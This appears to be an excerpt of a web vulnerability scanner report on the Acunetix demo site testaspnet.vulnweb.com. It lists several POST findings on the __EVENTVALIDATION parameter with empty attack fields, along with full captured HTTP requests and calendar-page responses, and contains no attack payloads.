Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8412&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAxfIv9NoIZGRkR22Q8tO4zxcjEVIA%2FDRYc79kKKI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKpitbeCQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVb79UCdSU2r3GssPNsH1F5ytjncA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:38 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAxfIv9NoIZGRkR22Q8tO4zxcjEVIA/DRYc79kKKI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpitbeCQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVb79UCdSU2r3GssPNsH1F5ytjncA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:White" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8316&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAHQvAqNoIZGRkzy00eSGWkTUTBk8fT55XMmH4XtA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKPnO3PCALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL5h6JQVNyf%2F%2FTmeqyMCXNeXffsOQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:40 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAHQvAqNoIZGRkzy00eSGWkTUTBk8fT55XMmH4XtA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKPnO3PCALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL5h6JQVNyf//TmeqyMCXNeXffsOQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:White" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
